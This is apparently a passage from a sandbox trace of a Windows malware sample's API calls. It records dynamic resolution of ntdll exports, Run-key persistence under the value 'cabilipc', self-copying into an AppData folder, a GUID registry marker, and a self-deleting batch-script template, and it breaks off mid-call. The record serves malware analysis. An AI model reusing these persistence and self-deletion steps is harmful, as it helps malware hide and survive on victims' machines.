(lpString="LdrOpenImageFileOptionsKey") returned 26 [0055.380] lstrlenA (lpString="LdrProcessRelocationBlock") returned 25 [0055.380] lstrlenA (lpString="LdrProcessRelocationBlockEx") returned 27 [0055.380] lstrlenA (lpString="LdrQueryImageFileExecutionOptions") returned 33 [0055.380] lstrlenA (lpString="LdrQueryImageFileExecutionOptionsEx") returned 35 [0055.380] lstrlenA (lpString="LdrQueryImageFileKeyOption") returned 26 [0055.380] lstrlenA (lpString="LdrQueryModuleServiceTags") returned 25 [0055.380] lstrlenA (lpString="LdrQueryOptionalDelayLoadedAPI") returned 30 [0055.380] lstrlenA (lpString="LdrQueryProcessModuleInformation") returned 32 [0055.380] lstrlenA (lpString="LdrRegisterDllNotification") returned 26 [0055.380] lstrlenA (lpString="LdrRemoveDllDirectory") returned 21 [0055.380] lstrlenA (lpString="LdrRemoveLoadAsDataTable") returned 24 [0055.380] lstrlenA (lpString="LdrResFindResource") returned 18 [0055.380] lstrlenA (lpString="LdrResFindResourceDirectory") returned 27 [0055.380] lstrlenA (lpString="LdrResGetRCConfig") returned 17 [0055.380] lstrlenA (lpString="LdrResRelease") returned 13 [0055.380] lstrlenA (lpString="LdrResSearchResource") returned 20 [0055.380] lstrlenA (lpString="LdrResolveDelayLoadedAPI") returned 24 [0055.380] lstrlenA (lpString="LdrResolveDelayLoadsFromDll") returned 27 [0055.380] lstrlenA (lpString="LdrRscIsTypeExist") returned 17 [0055.380] lstrlenA (lpString="LdrSetAppCompatDllRedirectionCallback") returned 37 [0055.380] lstrlenA (lpString="LdrSetDefaultDllDirectories") returned 27 [0055.380] lstrlenA (lpString="LdrSetDllDirectory") returned 18 [0055.380] lstrlenA (lpString="LdrSetDllManifestProber") returned 23 [0055.380] lstrlenA (lpString="LdrSetImplicitPathOptions") returned 25 [0055.380] lstrlenA (lpString="LdrSetMUICacheType") returned 18 [0055.380] lstrlenA (lpString="LdrShutdownProcess") returned 18 [0055.380] lstrlenA (lpString="LdrShutdownThread") returned 17 [0055.381] lstrlenA (lpString="LdrStandardizeSystemPath") returned 24 [0055.381] lstrlenA (lpString="LdrSystemDllInitBlock") returned 21 [0055.381] lstrlenA (lpString="LdrUnloadAlternateResourceModule") returned 32 [0055.381] lstrlenA (lpString="LdrUnloadAlternateResourceModuleEx") returned 34 [0055.381] lstrlenA (lpString="LdrUnloadDll") returned 12 [0055.381] lstrlenA (lpString="LdrUnlockLoaderLock") returned 19 [0055.381] lstrlenA (lpString="LdrUnregisterDllNotification") returned 28 [0055.381] lstrlenA (lpString="LdrVerifyImageMatchesChecksum") returned 29 [0055.381] lstrlenA (lpString="LdrVerifyImageMatchesChecksumEx") returned 31 [0055.381] lstrlenA (lpString="LdrWx86FormatVirtualImage") returned 25 [0055.381] lstrlenA (lpString="LdrpResGetMappingSize") returned 21 [0055.381] lstrlenA (lpString="LdrpResGetResourceDirectory") returned 27 [0055.381] lstrlenA (lpString="MD4Final") returned 8 [0055.381] lstrlenA (lpString="MD4Init") returned 7 [0055.381] lstrlenA (lpString="MD4Update") returned 9 [0055.381] lstrlenA (lpString="MD5Final") returned 8 [0055.381] lstrlenA (lpString="MD5Init") returned 7 [0055.381] lstrlenA (lpString="MD5Update") returned 9 [0055.381] lstrlenA (lpString="NlsAnsiCodePage") returned 15 [0055.381] lstrlenA (lpString="NlsMbCodePageTag") returned 16 [0055.381] lstrlenA (lpString="NlsMbOemCodePageTag") returned 19 [0055.381] lstrlenA (lpString="NtAcceptConnectPort") returned 19 [0055.381] lstrlenA (lpString="NtAccessCheck") returned 13 [0055.381] lstrlenA (lpString="NtAccessCheckAndAuditAlarm") returned 26 [0055.381] lstrlenA (lpString="NtAccessCheckByType") returned 19 [0055.381] lstrlenA (lpString="NtAccessCheckByTypeAndAuditAlarm") returned 32 [0055.381] lstrlenA (lpString="NtAccessCheckByTypeResultList") returned 29 [0055.381] lstrlenA (lpString="NtAccessCheckByTypeResultListAndAuditAlarm") returned 42 [0055.381] lstrlenA (lpString="NtAccessCheckByTypeResultListAndAuditAlarmByHandle") returned 50 [0055.381] lstrlenA (lpString="NtAddAtom") returned 9 [0055.381] lstrlenA (lpString="NtAddAtomEx") returned 11 [0055.381] lstrlenA (lpString="NtAddBootEntry") returned 14 [0055.381] lstrlenA (lpString="NtAddDriverEntry") returned 16 [0055.381] lstrlenA (lpString="NtAdjustGroupsToken") returned 19 [0055.381] lstrlenA (lpString="NtAdjustPrivilegesToken") returned 23 [0055.382] lstrlenA (lpString="NtAdjustTokenClaimsAndDeviceGroups") returned 34 [0055.382] lstrlenA (lpString="NtAlertResumeThread") returned 19 [0055.382] lstrlenA (lpString="NtAlertThread") returned 13 [0055.382] lstrlenA (lpString="NtAlertThreadByThreadId") returned 23 [0055.382] lstrlenA (lpString="NtAllocateLocallyUniqueId") returned 25 [0055.382] lstrlenA (lpString="NtAllocateReserveObject") returned 23 [0055.382] lstrlenA (lpString="NtAllocateUserPhysicalPages") returned 27 [0055.382] lstrlenA (lpString="NtAllocateUuids") returned 15 [0055.382] lstrlenA (lpString="NtAllocateVirtualMemory") returned 23 [0055.382] lstrlenA (lpString="NtAlpcAcceptConnectPort") returned 23 [0055.382] lstrlenA (lpString="NtAlpcCancelMessage") returned 19 [0055.382] lstrlenA (lpString="NtAlpcConnectPort") returned 17 [0055.382] lstrlenA (lpString="NtAlpcConnectPortEx") returned 19 [0055.382] lstrlenA (lpString="NtAlpcCreatePort") returned 16 [0055.382] lstrlenA (lpString="NtAlpcCreatePortSection") returned 23 [0055.382] lstrlenA (lpString="NtAlpcCreateResourceReserve") returned 27 [0055.382] lstrlenA (lpString="NtAlpcCreateSectionView") returned 23 [0055.382] lstrlenA (lpString="NtAlpcCreateSecurityContext") returned 27 [0055.382] lstrlenA (lpString="NtAlpcDeletePortSection") returned 23 [0055.382] lstrlenA (lpString="NtAlpcDeleteResourceReserve") returned 27 [0055.382] lstrlenA (lpString="NtAlpcDeleteSectionView") returned 23 [0055.382] lstrlenA (lpString="NtAlpcDeleteSecurityContext") returned 27 [0055.382] lstrlenA (lpString="NtAlpcDisconnectPort") returned 20 [0055.382] lstrlenA (lpString="NtAlpcImpersonateClientContainerOfPort") returned 38 [0055.382] lstrlenA (lpString="NtAlpcImpersonateClientOfPort") returned 29 [0055.382] lstrlenA (lpString="NtAlpcOpenSenderProcess") returned 23 [0055.382] lstrlenA (lpString="NtAlpcOpenSenderThread") returned 22 [0055.382] lstrlenA (lpString="NtAlpcQueryInformation") returned 22 [0055.382] lstrlenA (lpString="NtAlpcQueryInformationMessage") returned 29 [0055.382] lstrlenA (lpString="NtAlpcRevokeSecurityContext") returned 27 [0055.382] lstrlenA (lpString="NtAlpcSendWaitReceivePort") returned 25 [0055.382] lstrlenA (lpString="NtAlpcSetInformation") returned 20 [0055.382] lstrlenA (lpString="NtApphelpCacheControl") returned 21 [0055.382] lstrlenA (lpString="NtAreMappedFilesTheSame") returned 23 [0055.383] lstrlenA (lpString="NtAssignProcessToJobObject") returned 26 [0055.383] lstrlenA (lpString="NtAssociateWaitCompletionPacket") returned 31 [0055.383] lstrlenA (lpString="NtCallbackReturn") returned 16 [0055.383] lstrlenA (lpString="NtCancelIoFile") returned 14 [0055.383] lstrlenA (lpString="NtCancelIoFileEx") returned 16 [0055.383] lstrlenA (lpString="NtCancelSynchronousIoFile") returned 25 [0055.383] lstrlenA (lpString="NtCancelTimer") returned 13 [0055.383] lstrlenA (lpString="NtCancelTimer2") returned 14 [0055.383] lstrlenA (lpString="NtCancelWaitCompletionPacket") returned 28 [0055.383] lstrlenA (lpString="NtClearEvent") returned 12 [0055.383] lstrlenA (lpString="NtClose") returned 7 [0055.383] lstrlenA (lpString="NtCloseObjectAuditAlarm") returned 23 [0055.383] lstrlenA (lpString="NtCommitComplete") returned 16 [0055.383] lstrlenA (lpString="NtCommitEnlistment") returned 18 [0055.383] lstrlenA (lpString="NtCommitTransaction") returned 19 [0055.383] lstrlenA (lpString="NtCompactKeys") returned 13 [0055.383] lstrlenA (lpString="NtCompareObjects") returned 16 [0055.383] lstrlenA (lpString="NtCompareTokens") returned 15 [0055.383] lstrlenA (lpString="NtCompleteConnectPort") returned 21 [0055.383] lstrlenA (lpString="NtCompressKey") returned 13 [0055.390] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe") returned 40 [0055.390] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf013f, phkResult=0x1f4fee4 | out: phkResult=0x1f4fee4*=0x180) returned 0x0 [0055.390] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe") returned 40 [0055.390] RegQueryValueExW (in: hKey=0x180, lpValueName="cabilipc", lpReserved=0x0, lpType=0x1f4fedc, lpData=0x2358b90, lpcbData=0x1f4fee8*=0x52 | out: lpType=0x1f4fedc*=0x0, lpData=0x2358b90*=0xa0, lpcbData=0x1f4fee8*=0x52) returned 0x2 [0055.391] RegCloseKey (hKey=0x180) returned 0x0 [0055.391] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x1f4fee4 | out: TokenHandle=0x1f4fee4*=0x180) returned 1 [0055.391] GetTokenInformation (in: TokenHandle=0x180, TokenInformationClass=0x14, TokenInformation=0x1f4fee0, TokenInformationLength=0x4, ReturnLength=0x1f4fee8 | out: TokenInformation=0x1f4fee0, ReturnLength=0x1f4fee8) returned 1 [0055.391] GetTokenInformation (in: TokenHandle=0x180, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1f4fee8 | out: TokenInformation=0x0, ReturnLength=0x1f4fee8) returned 0 [0055.391] GetTokenInformation (in: TokenHandle=0x180, TokenInformationClass=0x19, TokenInformation=0x2358ac8, TokenInformationLength=0x14, ReturnLength=0x1f4fee8 | out: TokenInformation=0x2358ac8, ReturnLength=0x1f4fee8) returned 1 [0055.391] GetSidSubAuthorityCount (pSid=0x2358ad0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2358ad1 [0055.391] GetSidSubAuthority (pSid=0x2358ad0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2358ad8 [0055.391] CloseHandle (hObject=0x180) returned 1 [0055.391] ConvertStringSecurityDescriptorToSecurityDescriptorA () returned 0x1 [0055.401] CreateEventA (lpEventAttributes=0x1f4ff1c, bManualReset=1, bInitialState=0, lpName="Local\\{2F87B751-C28A-394B-44D3-167DB8B7AA01}") returned 0x1d4 [0055.401] GetLastError () returned 0x0 [0055.401] CloseHandle (hObject=0x1d4) returned 1 [0055.401] RegOpenKeyExA (in: hKey=0x80000003, lpSubKey=0x0, ulOptions=0x0, samDesired=0x20119, phkResult=0x1f4fed0 | out: phkResult=0x1f4fed0*=0x1d8) returned 0x0 [0055.402] RegEnumKeyExA (in: hKey=0x1d8, dwIndex=0x0, lpName=0x2358b30, lpcchName=0x1f4fee4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".DEFAULT", lpcchName=0x1f4fee4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0055.402] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0x0) returned 0x102 [0055.402] RegEnumKeyExA (in: hKey=0x1d8, dwIndex=0x1, lpName=0x2358b30, lpcchName=0x1f4fee4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="S-1-5-19", lpcchName=0x1f4fee4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0055.402] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0x0) returned 0x102 [0055.402] RegEnumKeyExA (in: hKey=0x1d8, dwIndex=0x2, lpName=0x2358b30, lpcchName=0x1f4fee4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="S-1-5-20", lpcchName=0x1f4fee4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0055.402] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0x0) returned 0x102 [0055.402] RegEnumKeyExA (in: hKey=0x1d8, dwIndex=0x3, lpName=0x2358b30, lpcchName=0x1f4fee4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="S-1-5-21-1462094071-1423818996-289466292-1000", lpcchName=0x1f4fee4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0055.402] StrChrA (lpStart="S-1-5-21-1462094071-1423818996-289466292-1000", wMatch=0x5f) returned 0x0 [0055.402] lstrcpyA (in: lpString1=0x1f4fd54, lpString2="S-1-5-21-1462094071-1423818996-289466292-1000" | out: lpString1="S-1-5-21-1462094071-1423818996-289466292-1000") returned="S-1-5-21-1462094071-1423818996-289466292-1000" [0055.402] lstrcatA (in: lpString1="S-1-5-21-1462094071-1423818996-289466292-1000", lpString2="\\Software\\Microsoft\\Windows\\CurrentVersion" | out: lpString1="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion") returned="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion" [0055.402] lstrcatA (in: lpString1="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion", lpString2="\\Explorer\\Shell Folders" | out: lpString1="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders") returned="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders" [0055.402] RegOpenKeyA (in: hKey=0x1d8, lpSubKey="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders", phkResult=0x1f4fe90 | out: phkResult=0x1f4fe90*=0x1dc) returned 0x0 [0055.402] RegQueryValueExW (in: hKey=0x1dc, lpValueName="AppData", lpReserved=0x0, lpType=0x1f4fe8c, lpData=0x0, lpcbData=0x1f4fe98*=0xfffffffe | out: lpType=0x1f4fe8c*=0x1, lpData=0x0, lpcbData=0x1f4fe98*=0x4c) returned 0x0 [0055.402] lstrlenW (lpString="autoclb.exe") returned 11 [0055.402] RegQueryValueExW (in: hKey=0x1dc, lpValueName="AppData", lpReserved=0x0, lpType=0x1f4fe8c, lpData=0x2358c40, lpcbData=0x1f4fe98*=0x4c | out: lpType=0x1f4fe8c*=0x1, lpData="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", lpcbData=0x1f4fe98*=0x4c) returned 0x0 [0055.402] PathCombineW (in: pszDest=0x2358c40, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", pszFile="adsldraw" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw" [0055.402] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adsldraw"), lpSecurityAttributes=0x0) returned 1 [0055.403] PathCombineW (in: pszDest=0x2358c40, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw", pszFile="autoclb.exe" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe" [0055.403] lstrcmpiW (lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", lpString2="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe") returned -1 [0055.403] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned 58 [0055.404] lstrcpyA (in: lpString1=0x1f4fdab, lpString2="\\Run" | out: lpString1="\\Run") returned="\\Run" [0055.404] RegOpenKeyExA (in: hKey=0x1d8, lpSubKey="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf013f, phkResult=0x1f4fea0 | out: phkResult=0x1f4fea0*=0x1e0) returned 0x0 [0055.404] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned 58 [0055.404] RegSetValueExW (in: hKey=0x1e0, lpValueName="cabilipc", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe", cbData=0x76 | out: lpData="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned 0x0 [0055.404] RegCloseKey (hKey=0x1e0) returned 0x0 [0055.404] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\educat.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0055.404] GetFileSize (in: hFile=0x1e0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xcd158 [0055.404] ReadFile (in: hFile=0x1e0, lpBuffer=0x60020, nNumberOfBytesToRead=0xcd158, lpNumberOfBytesRead=0x1f4fd18, lpOverlapped=0x0 | out: lpBuffer=0x60020*, lpNumberOfBytesRead=0x1f4fd18*=0xcd158, lpOverlapped=0x0) returned 1 [0055.411] CloseHandle (hObject=0x1e0) returned 1 [0055.411] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adsldraw\\autoclb.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0055.411] WriteFile (in: hFile=0x1e0, lpBuffer=0x61020*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1f4fd20, lpOverlapped=0x0 | out: lpBuffer=0x61020*, lpNumberOfBytesWritten=0x1f4fd20*=0x1000, lpOverlapped=0x0) returned 1 [0055.412] WriteFile (in: hFile=0x1e0, lpBuffer=0x61020*, nNumberOfBytesToWrite=0xcc158, lpNumberOfBytesWritten=0x1f4fd20, lpOverlapped=0x0 | out: lpBuffer=0x61020*, lpNumberOfBytesWritten=0x1f4fd20*=0xcc158, lpOverlapped=0x0) returned 1 [0055.415] SetEndOfFile (hFile=0x1e0) returned 1 [0055.416] CloseHandle (hObject=0x1e0) returned 1 [0055.425] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adsldraw\\autoclb.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0055.425] WriteFile (in: hFile=0x1e0, lpBuffer=0x60020*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1f4fd20, lpOverlapped=0x0 | out: lpBuffer=0x60020*, lpNumberOfBytesWritten=0x1f4fd20*=0x1000, lpOverlapped=0x0) returned 1 [0055.425] FlushFileBuffers (hFile=0x1e0) returned 1 [0055.438] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned 58 [0055.438] lstrcpyA (in: lpString1=0x1f4fd82, lpString2="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" | out: lpString1="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530") returned="Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530" [0055.438] RegCreateKeyA (in: hKey=0x1d8, lpSubKey="S-1-5-21-1462094071-1423818996-289466292-1000\\Software\\AppDataLow\\Software\\Microsoft\\667F6611-8D0F-88EB-47FA-113C6BCED530", phkResult=0x1f4fea0 | out: phkResult=0x1f4fea0*=0x1e4) returned 0x0 [0055.439] RegQueryValueExA (in: hKey=0x1e4, lpValueName="Client", lpReserved=0x0, lpType=0x1f4fe8c, lpData=0x1f4fe60, lpcbData=0x1f4fe98*=0x4c | out: lpType=0x1f4fe8c*=0x0, lpData=0x1f4fe60*=0x0, lpcbData=0x1f4fe98*=0x4c) returned 0x2 [0055.439] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned 58 [0055.439] RegSetValueExA (in: hKey=0x1e4, lpValueName="Install", Reserved=0x0, dwType=0x3, lpData=0x2358c40*, cbData=0x76 | out: lpData=0x2358c40*) returned 0x0 [0055.439] RegCloseKey (hKey=0x1e4) returned 0x0 [0055.439] RegCloseKey (hKey=0x1dc) returned 0x0 [0055.439] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0x0) returned 0x102 [0055.439] RegEnumKeyExA (in: hKey=0x1d8, dwIndex=0x4, lpName=0x2358b30, lpcchName=0x1f4fee4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="S-1-5-21-1462094071-1423818996-289466292-1000_Classes", lpcchName=0x1f4fee4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0055.439] StrChrA (lpStart="S-1-5-21-1462094071-1423818996-289466292-1000_Classes", wMatch=0x5f) returned="_Classes" [0055.439] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0x0) returned 0x102 [0055.439] RegEnumKeyExA (in: hKey=0x1d8, dwIndex=0x5, lpName=0x2358b30, lpcchName=0x1f4fee4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="S-1-5-18", lpcchName=0x1f4fee4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0055.439] WaitForSingleObject (hHandle=0xc4, dwMilliseconds=0x0) returned 0x102 [0055.439] RegEnumKeyExA (in: hKey=0x1d8, dwIndex=0x6, lpName=0x2358b30, lpcchName=0x1f4fee4, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="S-1-5-18", lpcchName=0x1f4fee4, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0055.439] RegCloseKey (hKey=0x1d8) returned 0x0 [0055.439] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe") returned 40 [0055.439] lstrcpyW (in: lpString1=0x2358b30, lpString2="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe" [0055.439] PathGetShortPath (in: pszLongPath="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\educat.exe" | out: pszLongPath="C:\\Users\\CIIHMN~1\\Desktop\\educat.exe") [0055.440] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned 58 [0055.440] lstrcpyW (in: lpString1=0x2358b90, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe" [0055.440] PathGetShortPath (in: pszLongPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\adsldraw\\autoclb.exe" | out: pszLongPath="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe") [0055.440] lstrlenW (lpString="C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe") returned 54 [0055.440] lstrlenW (lpString="C:\\Users\\CIIHMN~1\\Desktop\\educat.exe") returned 36 [0055.440] GetTickCount () returned 0x211f7 [0055.440] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x26 [0055.440] GetTempPathA (in: nBufferLength=0x26, lpBuffer=0x2358c10 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned 0x25 [0055.440] GetTickCount () returned 0x211f7 [0055.440] GetTempFileNameA (in: lpPathName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\", lpPrefixString=0x0, uUnique=0x22974ee, lpTempFileName=0x2358c10 | out: lpTempFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE.tmp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\74ee.tmp")) returned 0x74ee [0055.440] PathFindExtensionA (pszPath="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE.tmp") returned=".tmp" [0055.440] lstrcpyA (in: lpString1=0x2358c39, lpString2=".bin" | out: lpString1=".bin") returned=".bin" [0055.440] PathFindExtensionA (pszPath="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE.bin") returned=".bin" [0055.440] CreateDirectoryA (lpPathName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\74ee"), lpSecurityAttributes=0x0) returned 1 [0055.441] GetTickCount () returned 0x211f7 [0055.441] GetTempFileNameA (in: lpPathName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE", lpPrefixString=0x0, uUnique=0x0, lpTempFileName=0x2358c10 | out: lpTempFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.tmp" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\74ee\\11f7.tmp")) returned 0x11f7 [0055.441] PathFindExtensionA (pszPath="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.tmp") returned=".tmp" [0055.441] lstrcpyA (in: lpString1=0x2358c3e, lpString2=".bin" | out: lpString1=".bin") returned=".bin" [0055.441] PathFindExtensionA (pszPath="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bin") returned=".bin" [0055.441] lstrcpyA (in: lpString1=0x2358c3e, lpString2=".bat" | out: lpString1=".bat") returned=".bat" [0055.441] wsprintfA (in: param_1=0x2358c60, param_2="\"%S\" \"%S\"" | out: param_1="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"") returned 95 [0055.441] GetTickCount () returned 0x211f7 [0055.441] wsprintfA (in: param_1=0x2358dd0, param_2=":%u\r\nif not exist %%1 goto %u\r\ncmd /C \"%%1 %%2\"\r\nif errorlevel 1 goto %u\r\n:%u\r\ndel %%0" | out: param_1=":18135671\r\nif not exist %1 goto 4276831624\r\ncmd /C \"%1 %2\"\r\nif errorlevel 1 goto 18135671\r\n:4276831624\r\ndel %0") returned 110 [0055.441] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat") returned 50 [0055.441] mbstowcs (in: _Dest=0x23590e8, _Source="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat", _MaxCount=0x33 | out: _Dest="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat") returned 0x32 [0055.441] lstrlenA (lpString="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"") returned 95 [0055.441] mbstowcs (in: _Dest=0x2359158, _Source="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"", _MaxCount=0x60 | out: _Dest="\"C:\\Users\\CIIHMN~1\\AppData\\Roaming\\adsldraw\\autoclb.exe\" \"C:\\Users\\CIIHMN~1\\Desktop\\educat.exe\"") returned 0x5f [0055.442] lstrlenA (lpString="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat") returned 50 [0055.442] mbstowcs (in: _Dest=0x2359220, _Source="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat", _MaxCount=0x33 | out: _Dest="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat") returned 0x32 [0055.442] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\74EE\\11F7.bat", lpDst=0x0, 